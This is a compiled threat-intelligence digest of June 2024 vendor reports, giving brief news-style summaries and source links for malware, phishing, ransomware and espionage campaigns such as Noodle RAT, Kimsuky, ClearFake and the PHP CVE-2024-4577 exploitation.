Summary:: Researchers from Trend Micro have identified a new malware called Noodle RAT, also known as ANGRYREBEL or NoodRAT, targeting attacks in the Asia-Pacific region. It has both Windows and Linux versions with unique attributes. The Windows version, Win.NOODLERAT, runs in memory and requires specific loaders MULTIDROP and MICROLOAD. It is used by various APT groups for spying and communicates via TCP, SSL, and HTTP, using encryption. The Linux version, Linux.NOODLERAT, supports TCP and HTTP and is also used by various groups for both financial and espionage purposes. Noodle RAT can attack both Windows and Linux systems and keeps getting more advanced, making it a major threat.

Source: https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html

Intel Source:: Fortinet

Intel Name:: Shinra_and_Limpopo_ransomware_variants

Date of Scan:: 2024-06-17

Impact:: MEDIUM

Summary:: FortiGuard Labs got data on ransomware variants that triggered an interest that has been gaining traction within the OSINT community. FortiGuard's report on this 2 ransomware provides the community with insights into the evolving ransomware landscape and how to protect against those variants. The threat actor steals victims' data before deploying and running its ransomware malware to encrypt files. The ransomware is also designed to delete Volume Shadow Copies to inhibit system recovery. Additionally last March, FortiGuard Labs received an inquiry about another ransomware named “Socotra” due to its impact in that region. While there was no sample of the Socorta ransomware. It was tracked back to another ransomware, Limpopo, which was submitted to a publicly available file scanning service in February 2024 that targets ESXi environments.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-shinra-and-limpopo-ransomware

Intel Source:: Sygnia

Intel Name:: Velvet_Ant_Abuses_F5_Load_Balancers

Date of Scan:: 2024-06-17

Impact:: LOW

Summary:: Sygnia researchers have uncovered a cyber-attack on a large organization in East Asia attributed to a sophisticated group known as Velvet Ant, possibly linked to a China. This group has been infiltrating the organization's network for about three years, using advanced techniques and tools like the PlugX malware to exploit vulnerabilities in legacy systems and F5 BIG-IP devices to stay hidden and control network traffic. Velvet Ant evades detection by utilizing dormant malicious software and systems that are not closely monitored.

Source: https://www.sygnia.co/blog/china-nexus-threat-group-velvet-ant/

Intel Source:: GBhackers

Intel Name:: Kimsuky_group_launched_a_cyber_espionage_campaign

Date of Scan:: 2024-06-17

Impact:: HIGH

Summary:: A threat researcher from BlackBerry, shared an article on LinkedIn identifying that the North Korean state-sponsored group Kimsuky launched a cyber-espionage campaign targeting a Western European weapons manufacturer. Their attack vector started with a spear-phishing email sent to employees of the targeted organization. The threat group's new tools were used showcasing their evolving capabilities. Their main target was a Western European weapons manufacturer, highlighting the strategic importance of the defense sector and deceptive Lure, the attackers used a well-known military contractor, “General Dynamics”.

Source: https://gbhackers.com/north-korean-kimsuky-attacking/

Intel Source:: Proofpoint

Intel Name:: TA571_and_ClearFake_Exploiting_PowerShell

Date of Scan:: 2024-06-17

Impact:: LOW

Summary:: Researchers from Proofpoint have discovered that hackers are using a technique to trick people into running harmful PowerShell scripts on their computers. This technique involves showing a fake error message and asking users to copy and paste malicious scripts into PowerShell or the Windows Run dialog box. Hackers like TA571 and the ClearFake group are using this method to spread malware such as DarkGate, Matanbuchus, NetSupport, and other data-stealing software.

Source: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn

Intel Source:: BushidoToken Threat Intel

Intel Name:: Analysis_of_the_Qilin_RaaS

Date of Scan:: 2024-06-14

Impact:: LOW

Summary:: Qilin ransomware has been active since at least May 2022 and is named after a mythical Chinese beast pronounced "Chee-lin". However, it is thought that this threat group of cybercriminals originated in Russia. Qilin is a Ransomware-as-a-Service (RaaS) platform, which means that hackers outside of the main Qilin team (also known as ransomware affiliates) can use it to launch ransomware attacks. The Qilin RaaS will handle payload creation, stolen data dissemination, and ransom negotiations.

Source: https://blog.bushidotoken.net/2024/06/tracking-adversaries-qilin-raas.html

Intel Source:: Genians

Intel Name:: KimSuki_Impersonation_Attack_Uncovered_in_Foreign_Media_Interview_Request

Date of Scan:: 2024-06-14

Impact:: LOW

Summary:: Genians researchers have uncovered a sophisticated spear phishing campaign targeting North Korean human rights activists. The attackers pretend to be researchers from a foreign news agency, sending fake interview requests about peace on the Korean Peninsula. They use malicious MSC files disguised as safe document to steal information once connected to a C2 server in Italy. This MSC attack method also influences the China-based threat group Mustang Panda. The attackers lure their targets through email and Facebook interactions, making their attacks more effective.

Source: https://www.genians.co.kr/blog/threat_intelligence/interview

Intel Source:: NetLab

Intel Name:: Diving_Deep_into_Botnet_911S5_Digital_Legacy

Date of Scan:: 2024-06-14

Impact:: LOW

Summary:: According to the analysis of the 360 Threat Intelligence Center, 911S5 started operating in 2014 and was shut down in July 2022. It changed its name again in October 2023 and continued its evil work under the alias CloudRouter. It was eventually destroyed by multinational law enforcement in May 2024. The 911S5 botnet is known for its high-profile activity, lengthy running duration, and 19 million IP addresses spread across several nations. Law enforcement activities led to its overturn, but its digital legacy remains a real and significant threat to cyberspace.

Source: https://blog.netlab.360.com/911s5/

Intel Source:: Esentire

Intel Name:: SolarMarker_Impersonates_as_Indeed_Job_Site_with_Team_Building_Theme

Date of Scan:: 2024-06-14

Impact:: MEDIUM

Summary:: Researchers at Esentire uncovered the SolarMarker infection incident. This Incident originating from a fake website masquerading as the job search platform Indeed. The infection occurs when a user searching for workplace team-building ideas is redirected to this malicious site, where they unknowingly download malware that appears to be a legitimate document but is the SolarMarker malware. This malware employs advanced techniques like encrypted backdoors and manipulation to infect systems. It deploys malicious tools such as StellarInjector and SolarPhantom to steal data and gain hidden access to machines.

Source: https://www.esentire.com/blog/solarmarker-impersonates-job-employment-website-indeed-with-a-team-building-themed-lure

Intel Source:: Bitdefender

Intel Name:: PHP_vulnerability_under_active_exploit

Date of Scan:: 2024-06-14

Impact:: MEDIUM

Summary:: Bitdefender has also notified about the active exploitation of the vulnerability in PHP. CVE-2024-4577 is a critical flaw affecting PHP versions 5.x and newer on Windows servers, enabling attackers to remotely execute PHP code on compromised servers. This vulnerability originates from how PHP manages character conversions, particularly for languages such as Chinese or Japanese. Exploiting this flaw allows attackers to gain control over servers, posing risks to data confidentiality, system integrity, and availability. Cybercriminals, including groups like "TellYouThePass," have been actively scanning and exploiting this vulnerability for malicious purposes.

Source: https://www.bitdefender.com/blog/businessinsights/technical-advisory-cve-2024-4577-php-vulnerability-under-active-exploit/

Intel Source:: Esentire

Intel Name:: Matanbuchus_Malware

Date of Scan:: 2024-06-14

Impact:: LOW

Summary:: Researchers at eSentire have noticed a rise in observations of Matanbuchus malware. The loader-type malware known as Matanbuchus was first discovered in 2021. It has been used to launch several secondary payloads, including Danabot, Qakbot, and Cobalt Strike. In recent findings, malicious web-browser advertising (Malvertising) were utilized to drive viewers to threat actor-controlled web pages. Users were asked to download a ZIP file from the website. Matanbuchus is deployed after extracting and interacting with the ZIP file's contents. All recent instances were interrupted prior to the delivery of a secondary payload.

Source: https://www.esentire.com/security-advisories/matanbuchus-malware

Intel Source:: Resecurity

Intel Name:: Smishing_Triad_targeting_Pakistan

Date of Scan:: 2024-06-14

Impact:: LOW

Summary:: Resecurity has detected a new activity of a threat actors group Smishing Triad, which is now moving on targeting Pakistan. The group's tactics involve sending malicious messages impersonating Pakistan Post to customers of mobile carriers via iMessage and SMS, to steal their personal and financial information. The code and templates used by the attackers are consistent with previous instances of Smishing Triad activity targeting online banking, e-commerce, and payment systems customers in other regions.

Source: https://www.resecurity.com/blog/article/smishing-triad-is-targeting-pakistan-to-defraud-banking-customers-at-scale

Intel Source:: Volexity

Intel Name:: DISGOMOJI_Malware_Used_to_Target_Indian_Government

Date of Scan:: 2024-06-14

Impact:: MEDIUM

Summary:: Researchers at Volexity have discovered a cyber-espionage effort carried out by a possible threat actor based in Pakistan, which Volexity is presently monitoring under the alias UTA0137. Volexity lists the malware employed in these latest attacks as DISGOMOJI, which is built for Linux systems and written in Golang. Volexity is confident that UTA0137 has espionage-related goals and a mandate to target government entities in India.

Source: https://www.volexity.com/blog/2024/06/13/disgomoji-malware-used-to-target-indian-government/

Intel Source:: PaloAlto

Intel Name:: KoiLoader_or_KoiStealer_Evades_Detection_with_Initial_Email_Query_Tactic

Date of Scan:: 2024-06-13

Impact:: LOW

Summary:: Unit42 timely threat intel researchers have observed that threat actors are distributing KoiLoader / KoiStealer tries and tries to evade detection by using an initial email query. Only sends a message linking to the malware after the targeted organization responds.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-12-IOCs-for-Koi-Loader-Stealer-infection.txt

Intel Source:: Threatdown

Intel Name:: An_Overview_of_SmartApeSG

Date of Scan:: 2024-06-13

Impact:: LOW

Summary:: Threatdown researchers have identified a new scam variant called SmartApeSG. SmartApeSG leverages compromised websites to load a fake browser update template to install NetSupport RAT malware. When users visit these compromised sites with Microsoft Edge, they see a message to update their browser. Clicking the Update Edge button downloads a zip file containing a false JavaScript file. Running this file triggers a PowerShell command that downloads and runs the NetSupport RAT malware.

Source: https://www.threatdown.com/blog/smartapesg-06-11-2024/

Intel Source:: Cisco Talos

Intel Name:: Operation_Celestial_Force_Targeting_Indian_Entities

Date of Scan:: 2024-06-13

Impact:: LOW

Summary:: Researchers from Cisco Talos have revealed Operation Celestial Force, a new malware operation that has been active since at least 2018. It is still in use today, using a Windows-based malware loader known as HeavyLift in addition to the Android-based malware GravityRAT. A stand-alone program they are referring to as GravityAdmin is responsible for managing all GravityRAT and HeavyLift infections. It performs malicious operations on a compromised device. Analysis of the panel binaries reveals that they are intended to administer and execute numerous campaigns at the same time, each with its own admin panel and codename.

Source: https://blog.talosintelligence.com/cosmic-leopard/

Intel Source:: ASEC

Intel Name:: Kimsuky_Threat_Group_Exploiting_MS_Office_Vulnerability_to_Distribute_Keylogger

Date of Scan:: 2024-06-13

Impact:: LOW

Summary:: Researchers from ASEC have observed that Kimsuky threat group is exploiting a vulnerability (CVE-2017-11882) in the MS Office equation editor (EQNEDT32.EXE) to distribute a keylogger. The attackers use this vulnerability to execute a page with an embedded malicious script via the mshta process, thereby distributing the keylogger.

Source: https://asec.ahnlab.com/en/66720/

Intel Source:: ASEC

Intel Name:: Analysis_of_attack_cases_targeting_domestic_ERP_servers_installing_SoftEther_VPN

Date of Scan:: 2024-06-13

Impact:: LOW

Summary:: Researchers from (ASEC) have recently discovered an attack on a domestic company's ERP server. The attacker exploited vulnerabilities in the MS-SQL service, allowing the attacker to install a web shell for control, and then set up a SoftEther VPN server. This transformed the compromised system into a VPN server, helping the attacker to enhance their privacy and security. The tools used in this attack, like FRP, HTran, and custom malware, are common in advanced threats and ransomware attacks

Source: https://asec.ahnlab.com/ko/66581/

Intel Source:: ASEC

Intel Name:: Bondnet_Leveraging_Miner_Bots_as_C2

Date of Scan:: 2024-06-12

Impact:: LOW

Summary:: Researchers from ASEC have uncovered that the Bondnet threat actor is still operational through investigating systems that have been infected with Bondnet miners. They have also discovered instances of them setting up a reverse RDP environment on high-performance bots and using them as C2 servers since 2023. When specific requirements were met by high-performance bots, the reverse RDP environment was created.

Source: https://asec.ahnlab.com/en/66662/

Intel Source:: Trustwave

Intel Name:: Misuse_of_Windows_Search_to_Lead_to_Malicious_Content

Date of Scan:: 2024-06-12

Impact:: MEDIUM

Summary:: Trustwave SpiderLabs researchers have discovered a sophisticated malware campaign that uses the Windows search functionality contained in HTML code to deliver malware. They discovered the threat actors were employing a highly developed comprehension of user behavior and vulnerabilities in the system. The campaign begins with a suspicious email that appears to be an invoice or other common document but actually contains an HTML attachment. To improve deception and avoid being detected by email security scanners, the threat actor encloses the HTML file inside a ZIP archive.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/search-spoof-abuse-of-windows-search-to-redirect-to-malware/

Intel Source:: Mandiant

Intel Name:: Perspectives_on_Cyberthreats_Aimed_at_Brazilian_Users_and_Businesses

Date of Scan:: 2024-06-12

Impact:: LOW

Summary:: The analysis presents a detailed perspective of Brazil's complex cyber threat ecosystem, combining findings from Google's Threat Analysis Group and Mandiant intelligence. It focuses on the actions of state-sponsored cyber espionage groups targeting Brazil, particularly those from China, North Korea, and Russia. It also covers the domestic cybercrime ecosystem, with a focus on financially motivated threats and the distinct characteristics of Brazilian cybercriminals.

Source: https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil/

Intel Source:: Symantec

Intel Name:: Privilege_Escalation_Vulnerability_May_Have_Used_by_Ransomware_Attackers_as_Zero_day

Date of Scan:: 2024-06-12

Impact:: MEDIUM

Summary:: The Black Basta ransomware is operated by the Cardinal cybercrime group (also known as Storm-1811, UNC4393), who may have been using a zero-day exploit of a Windows privilege escalation vulnerability that was just patched. There is a vulnerability in the Windows Error Reporting Service (CVE-2024-26169). If exploited on affected systems, it can allow an attacker to gain elevated privileges. On March 12, 2024, the vulnerability was fixed, and Microsoft reported at the time that there was no proof of its exploitation in the wild. However, examination of an exploit tool used in recent attacks revealed that it might have been compiled before patching, implying that at least one group may have exploited the vulnerability as a zero-day.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/black-basta-ransomware-zero-day

Intel Source:: G DATA

Intel Name:: New_BadSpace_Backdoor_Targeting_High_Ranking_Websites

Date of Scan:: 2024-06-12

Impact:: LOW

Summary:: Researchers from G Data have discovered a new backdoor named BadSpace, deployed through a sophisticated multi-stage attack. This attack involves infected websites, a C2 server, and sometimes a fake browser update. The initial infection begins with malicious code on high-ranking websites, particularly WordPress sites, which track user visits through cookies. On a first visit, the website gathers user data and sends a GET request to a constructed URL, delivering a payload that can overwrite the webpage content. The malicious code is often injected into JavaScript libraries like jQuery or the website’s index page. The backdoor is deployed via JScript files, sometimes disguised with extensions like “.pdf.js.” Some infected sites present a fake Google Chrome update window, which, when downloaded, installs the backdoor or JScript on the system.

Source: https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor

Intel Source:: CERT-AGID

Intel Name:: Adwind_jRAT_campaigns_targeting_Italian_entities

Date of Scan:: 2024-06-12

Impact:: LOW

Summary:: Researchers at CERT-AGID have noted the emergence of several malicious actions directed against Italy with the intention of spreading the Adwind/jRAT malware. Emails typically contain a ZIP archive containing HTML files with the names DOCUMENT.html or INVOICE.html. A double file extension, like .pdf.html, is also used in some situations. JavaScript code included in the HTML file verifies the browser's language setting when it is opened. The malicious page's content appears if the browser language is set to Italian; otherwise, a blank page is shown.

Source: https://cert-agid.gov.it/news/campagne-adwind-jrat-attive-contro-obiettivi-italiani/

Intel Source:: Imperva

Intel Name:: PHP_Flaw_Exploited_by_TellYouThePass_Ransomware_Campaign

Date of Scan:: 2024-06-12

Impact:: MEDIUM

Summary:: According to Imperva Threat Researchers, attackers are using the recently discovered PHP vulnerability, CVE-2024-4577. Since June 8th, they have seen attacker activity utilizing this vulnerability to distribute malware, which they have now identified as part of the "TellYouThePass" ransomware campaign. TellYouThePass is a ransomware campaign that has been spotted since 2019, targeting both businesses and individuals on Windows and Linux computers. It frequently makes use of CVE-2021-44228 (Apache Log4j), while it has also been observed to make use of CVE-2023-46604 as well.

Source: https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized-to-distribute-tellyouthepass-ransomware/

Intel Source:: X (Twitter)

Intel Name:: Gitloker_Attack_Leveraging_GitHub_Notifications_to_Push_Malicious_oAuth_Apps

Date of Scan:: 2024-06-11

Impact:: LOW

Summary:: In an ongoing extortion campaign that wipes compromised repositories, threat actors impersonate GitHub's security and recruitment personnel in phishing attacks to hijack repositories using malicious OAuth apps. The phishing emails drive potential victims to the fake GitHub talent community domains, as discovered by CronUp security researcher Germán Fernández on X (Twitter).

Source: https://x.com/1ZRR4H/status/1798926893246447708

Intel Source:: Elastic

Intel Name:: WARMCOOKIE_Backdoor

Date of Scan:: 2024-06-11

Impact:: MEDIUM

Summary:: Elastic Security Labs have recently identified a wave of phishing email campaigns deploying a new backdoor called WARMCOOKIE. These phishing campaigns mainly use job and recruiting themes to target individuals with modified emails that lure them into clicking seemingly legitimate links. These links lead to landing pages that mimic real job portals. After solving a CAPTCHA, a harmful JavaScript file is downloaded. WARMCOOKIE uses hard-coded addresses and encryption to communicate. The attackers keep changing their online setup to avoid detection. WARMCOOKIE stays on the computer by creating a task that runs every 10 minutes.

Source: https://www.elastic.co/security-labs/dipping-into-danger

Intel Source:: SOC Radar

Intel Name:: Malvertising_Campaign_Targeting_PuTTY_and_WinSCP_Users_to_Compromise_Windows_Administrators

Date of Scan:: 2024-06-11

Impact:: LOW

Summary:: Researchers from SOC Radar have discovered a recent malvertising campaign that poses a significant threat to Windows administrators by targeting users of PuTTY and WinSCP. This real-world attack involves cybercriminals employing deceptive tactics to entice victims into downloading trojanized installers from fraudulent download sites.

Source: https://socradar.io/malvertising-campaign-targets-windows-administrators-using-putty-and-winscp/

Intel Source:: Zscaler

Intel Name:: Latest_Variant_of_ValleyRAT_Targeting_Devices_with_New_Techniques

Date of Scan:: 2024-06-11

Impact:: LOW

Summary:: Researchers at Zscaler have discovered a new campaign used to deliver ValleyRAT, a malware developed by a China-based threat actor. This latest ValleyRAT variant shows modifications compared to previously documented versions. These changes include updates in device fingerprinting, bot ID generation, and the range of commands supported by the RAT.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-latest-variant-valleyrat

Intel Source:: Cyble

Intel Name:: Vietnamese_Entities_Targeted_by_China_Linked_Mustang_Panda_in_Cyber_Espionage

Date of Scan:: 2024-06-11

Impact:: LOW

Summary:: CRIL researchers have identified a campaign by the China-based cyber espionage group Mustang Panda, targeting Vietnamese entities with tax compliance themes. This campaign is linked to an earlier one that targeted entities interested in the education sector. Both campaigns started with spam emails containing ZIP or RAR files with malicious LNK files. These LNK files executed further malicious activities using PowerShell and batch files. The group have advance techniques such as using legitimate tools to evade detection and show their focus on individuals in the financial and educational sectors to gain access to sensitive information.

Source: https://cyble.com/blog/vietnamese-entities-targeted-by-china-linked-mustang-panda-in-cyber-espionage

Intel Source:: ASEC

Intel Name:: SmallTiger_Malware_Attacks_on_South_Korean_Businesses

Date of Scan:: 2024-06-11

Impact:: MEDIUM

Summary:: AhnLab Security Intelligence Center (ASEC) has been addressing attacks on South Korean businesses using the SmallTiger malware, attributed to the Kimsuky group. The initial access method is unknown, but SmallTiger was deployed during lateral movement. The attacks initially involved DurianBeacon malware, later transitioning to SmallTiger as a downloader since February 2024. These attacks exploited software updater programs and targeted defense contractors, automobile part manufacturers, and semiconductor manufacturers.

Source: https://asec.ahnlab.com/en/66546/

Intel Source:: ASEC

Intel Name:: ASEC_Discovers_Remcos_RAT_Delivered_via_UUEncoded_Phishing_Emails

Date of Scan:: 2024-06-11

Impact:: MEDIUM

Summary:: The AhnLab Security Intelligence Center (ASEC) has detected a new malware distribution campaign using UUEncoded (UUE) files to deliver Remcos RAT through phishing emails. These emails, disguised as import/export shipment or quotation details, contain encoded VBS scripts designed to bypass detection.

Source: https://asec.ahnlab.com/en/66463/

Intel Source:: ASEC

Intel Name:: Attackers_Exploiting_Cloud_Services_for_Malware_Distribution_and_Data_Theft

Date of Scan:: 2024-06-11

Impact:: MEDIUM

Summary:: Researchers at AhnLab Security Intelligence Center have discovered that attackers are leveraging cloud services like Google Drive, OneDrive, and Dropbox to gather user information and disseminate malware. These attackers primarily upload malicious scripts, Remote Access Trojan (RAT) malware, and decoy documents to these cloud platforms to execute their attacks. The files uploaded by the attackers operate systematically, carrying out a range of malicious activities.

Source: https://asec.ahnlab.com/en/66429/

Intel Source:: Intezer

Intel Name:: Diving_Deep_into_SSLoad_Malware

Date of Scan:: 2024-06-11

Impact:: LOW

Summary:: Researchers at Intezer have provided an in-depth analysis of SSLoad, a stealthy malware targeting victims since April 2024. It highlights the diverse delivery methods, including phishing emails with decoy Word documents and fake Azure pages, leading to the installation of SSLoad payloads. The investigation looks into the malware's functionality and payload execution chain, with a focus on flexibility and potential usage in Malware-as-a-Service operations.

Source: https://intezer.com/blog/research/ssload-technical-malware-analysis/

Intel Name:: UNC5537_attacks_Snowflake_customer_instances

Date of Scan:: 2024-06-10

Impact:: MEDIUM

Summary:: Based on Google's recent investigations, the UNC5537 threat actor accessed multiple organizations’ Snowflake customer instances through stolen customer credentials. These credentials were stolen from multiple infostealer malware campaigns that infected non-Snowflake owned systems. The threat actor accessed the affected customer accounts and exported significant customer data from the Snowflake customer instances. Mandiant identified that most of the credentials used by UNC5537 were available from previous infostealer infections, some of them were back from 2020.

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion https://www.virustotal.com/gui/collection/0d487b996555e03ea2853d24c805a473822fafd7da683ab2123d0f1e688001b8

Intel Source:: ISC.SANS

Intel Name:: Probing_for_new_PHP_vulnerability

Date of Scan:: 2024-06-10

Impact:: LOW

Summary:: ISC. SANS researcher in his article discusses a new detection of probes for PHP vulnerability CVE-2024-4577 which affects CGI mode in certain locales. It lets OS command injection via user-supplied parameters to "php.exe" on Windows.

Source: https://isc.sans.edu/diary/Attacker+Probing+for+New+PHP+Vulnerablity+CVE20244577/30994/

Intel Source:: The DFIR Report

Intel Name:: IcedID_Brings_ScreenConnect_and_CSharp_Streamer_to_ALPHV_Ransomware_Deployment

Date of Scan:: 2024-06-10

Impact:: MEDIUM

Summary:: The DFIR report researchers have discovered a sophisticated cyber intrusion that began with a phishing email containing IcedID malware and progressed to the deployment of Cobalt Strike and CSharp Streamer for reconnaissance and lateral movement. Over eight days, the attacker gained access to critical servers, exfiltrated data via Rclone, and eventually installed ALPHV ransomware, deleting backups and leaving ransom notes.

Source: https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/

Intel Source:: Bi.Zone

Intel Name:: Sapphire_Werewolf_attacks

Date of Scan:: 2024-06-10

Impact:: LOW

Summary:: The Sapphire Werewolf group used the Amethyst stealer to attack over 300 companies by using malicious files and Windows Task Scheduler for persistence. The stealer collects sensitive data, sends it to a Telegram bot, and evolves with password-protected archives.

Source: https://bi.zone/eng/expertise/blog/sapphire-werewolf-ottachivaet-izvestnyy-stiler-dlya-novykh-atak/

Intel Source:: G DATA

Intel Name:: Unveiling_the_JScript_RAT_Attack_Chain

Date of Scan:: 2024-06-10

Impact:: LOW

Summary:: GDATA researchers have found that in recent years, JScript-based RATs have frequently been deployed via phishing campaigns. When the initial loader script is executed, it connects to a command and control (C&C) server, which responds with a new malicious script. This is the second stage loader, and it is run on demand. The second stage loader communicates with the C&C server to get the RAT component, which is once again built in JScript. The RAT component can run indefinitely unless told to stop, and it can carry out additional commands from the C&C server.

Source: https://www.gdatasoftware.com/blog/2024/06/37955-jscript-rat-and-cobaltstrike

Intel Source:: SOC Radar

Intel Name:: The_Grandoreiro_Malware_Campaign

Date of Scan:: 2024-06-10

Impact:: LOW

Summary:: Researchers at SOC Radar have discovered that the Grandoreiro banking malware has resurfaced as a huge global danger to banking security, despite law enforcement efforts to shut it down. Initially discovered in 2016, this sophisticated malware for Windows has affected more than 1,500 banks in over 60 countries. It uses cutting-edge methods to penetrate networks and evade detection. A wide range of hackers can access it since it employs a Malware-as-a-Service (MaaS) approach.

Source: https://socradar.io/grandoreiro-malware-campaign-a-global-threat-to-banking-security/

Intel Source:: Fortinet

Intel Name:: New_Phishing_Campaign_Using_Stealthy_JPGs_to_Drop_Agent_Tesla

Date of Scan:: 2024-06-10

Impact:: MEDIUM

Summary:: Researchers from FortiGuard Labs have discovered a phishing campaign targeting Spanish-speaking individuals to spread a new Agent Tesla malware variant. The campaign using various techniques to target Windows-based systems and deliver the core module, including MS Office vulnerabilities, JavaScript code, PowerShell code, and fileless modules.

Source: https://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people

Intel Source:: Threatdown

Intel Name:: The_ClearFake_malware_updated_techiques

Date of Scan:: 2024-06-10

Impact:: LOW

Summary:: The ClearFake malware campaign has come back with a new technique that uses social engineering to mimic browser updates via compromised websites. It tricks users into running malicious PowerShell code, leading to Lumma Stealer malware infection.

Source: https://www.threatdown.com/blog/clearfake-walkthrough-06-03-2024/

Intel Source:: Wiz blog

Intel Name:: An_ongoing_cryptojacking_campaign_targeting_Kubernetes_clusters

Date of Scan:: 2024-06-08

Impact:: LOW

Summary:: The Wiz researchers observed a new type of ongoing cryptojacking campaign that attacked misconfigured Kubernetes clusters in the customers’ cloud environments. In this campaign, the threat actor took advantage of anonymous access to an Internet-facing cluster to start malicious container images hosted at Docker Hub. These docker images contain a UPX-packed DERO miner named "pause".

Source: https://www.wiz.io/blog/dero-cryptojacking-campaign-adapts-to-evade-detection

Intel Source:: Lacework

Intel Name:: Hijacking_with_composite_alerts

Date of Scan:: 2024-06-07

Impact:: MEDIUM

Summary:: Lacework analysts discovered a reconnaissance followed by privilege escalation with Amazon Web Services (AWS) Management Console access and then subsequent resource-hijacking (T1496) of the AWS Bedrock service. The researchers think the attacker was able to leverage the issue by first gaining initial access to the customer's AWS environment, likely through stolen or compromised credentials.

Source: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts

Intel Source:: Hornet Security

Intel Name:: New_threat_campaigns_involving_Darkgate

Date of Scan:: 2024-06-07

Impact:: MEDIUM

Summary:: The team at Hornetsecurity has observed a new campaign distributing the Darkgate Malware using a technique known as pastejacking. Their report contained a detailed deep-dive.

Source: https://www.hornetsecurity.com/en/threat-research/monthly-threat-report-june-2024/

Intel Source:: Sucuri

Intel Name:: Fake_Google_Chrome_Update_Pop_Ups_Aim_for_Hundreds_of_Websites

Date of Scan:: 2024-06-07

Impact:: LOW

Summary:: Sucuri researchers have discovered fake browser update campaigns, which are infamous for the deceptive tactics employed by hackers to trick users into installing malicious software. These campaigns usually entail introducing malicious code into a website, which then shows a popup message encouraging users to update their web browser. When users click on the given link, malware like infostealer or remote access trojans are typically downloaded

Source: https://blog.sucuri.net/2024/06/hundreds-sites-targeted-by-fake-chrome-update-pop-ups.html

Intel Source:: Esentire

Intel Name:: Delivery_of_Vidar_stealer_by_AutoIt

Date of Scan:: 2024-06-07

Impact:: MEDIUM

Summary:: Last month, eSentire’s researchers observed an attack involving a fake KMSPico activator tool, that is capable delivering of Vidar Stealer through some events. The attack leveraged Java dependencies and a malicious AutoIt script to disable Windows Defender and then decrypt the Vidar payload via the shellcode. In this time attack, the user did a web search for KMSPico and browsed to the top result (kmspico[.]ws). This tool is for a “universal activator” for Windows and appears to no longer be maintained

Source: https://www.esentire.com/blog/autoit-delivering-vidar-stealer-via-drive-by-downloads

Intel Source:: Esentire

Intel Name:: More_eggs_Activity_Persists_Via_Fake_Job_Applicant_Lures

Date of Scan:: 2024-06-07

Impact:: MEDIUM

Summary:: ESentire's threat researchers have identified a malware campaign called More_eggs targeting an industrial services client. More_eggs is malicious software designed to steal credentials for corporate bank accounts and email accounts. It is sold on the Dark Web as Malware-as-a-Service (MaaS). This malware created by the Golden Chickens group (aka Venom Spider) and utilizing by FIN6, Evilnum, and Cobalt cybercriminals. In this campaign, the attacker pretended to be a job applicant, luring the recruiter into downloading a fake resume from a malicious site. When the recruiter clicked the ‘Download CV’ button, it downloaded a malicious Windows Shortcut File (LNK) named “Christian C. Velour.” This file contained a hidden command to download a malicious DLL. This tactic was like those seen in early 2022.

Source: https://www.esentire.com/blog/more-eggs-activity-persists-via-fake-job-applicant-lures

Intel Source:: Morphisec

Intel Name:: Sticky_Werewolf_Latest_Malicious_Aviation_Attacks

Date of Scan:: 2024-06-07

Impact:: LOW

Summary:: Morphisec Labs has discovered the campaign of Sticky Werewolf, a cyber threat group first detected in April 2023. This group is active and targets different sectors with political or hacktivist motives. Initially, they attacked public organizations in Russia and Belarus, but now they have expanded to areas like pharmaceuticals and microbiology. Recently, they have targeted the aviation industry using phishing emails that appear to come from a Moscow aerospace company. These emails contain files that lure recipients into running malicious software hosted on WebDAV servers. Once activated, the malware installs itself, avoids detection, and steals data.

Source: https://blog.morphisec.com/sticky-werewolfs-aviation-attacks

Intel Source:: ISC.SANS

Intel Name:: Malicious_Python_Script_with_a_Best_Before_Date

Date of Scan:: 2024-06-06

Impact:: LOW

Summary:: Researchers at ISC.SANS have discovered a funny piece of malicious Python script using the same technique. Only before the specified time (in this case, June 10th) would it execute. The script's objective is straightforward, it is to retrieve a payload from a remote location, insert it into memory, and initiate a new thread. These payloads are typically associated with CobaltStike.

Source: https://isc.sans.edu/diary/rss/30988

Intel Source:: Aquasec

Intel Name:: Muhstik_malware_targets_message_applications

Date of Scan:: 2024-06-06

Impact:: LOW

Summary:: Aqua Nautilus analysts observed a new malware called Muhstik which targets message queuing services applications like the Apache RocketMQ platform. The attackers exploited a known vulnerability in the platform. The analysts covered in their analysis how the attackers exploit the existing vulnerability in RocketMQ, examined how the Muhstik malware affects the compromised instances, and analyzed the number of RocketMQ instances worldwide vulnerable to this attack.

Source: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/

Intel Source:: NTT Security

Intel Name:: Operation_ControlPlug_malicious_activities

Date of Scan:: 2024-06-06

Impact:: MEDIUM

Summary:: The threat group DarkPeony, also known as Operation ControlPlug, employed a novel technique involving MSC (Microsoft Common Console Document) files to initiate their malicious activities. These files leveraged the Console Taskpad feature to execute PowerShell scripts that downloaded and executed malware, ultimately leading to the deployment of PlugX.

Source: https://jp.security.ntt/tech_blog/controlplug

Intel Source:: CERT-UA

Intel Name:: An_Attack_of_Vermin_Uses_SPECTR_WPS_in_Conjunction_With_SickSync_Campaign

Date of Scan:: 2024-06-06

Impact:: LOW

Summary:: Researchers from CERT-UA have identified and examined the UAC-0020 (Vermin) group's actions, which are directed towards the Ukrainian Defense Forces. The cyberthreat was implemented through the use of the SPECTR malware, which has been known since 2019. Simultaneously, the standard synchronization functionality of the legitimate SyncThing software was used to download stolen documents, files, passwords, and other information from the computer, which, among other things, allows for the development of a peer-to-peer connection between computers.

Source: https://cert.gov.ua/article/6279600

Intel Source:: sophos

Intel Name:: Chinese_Cyber_Espionage_Campaigns_Targeting_Southeast_Asian_Government

Date of Scan:: 2024-06-06

Impact:: MEDIUM

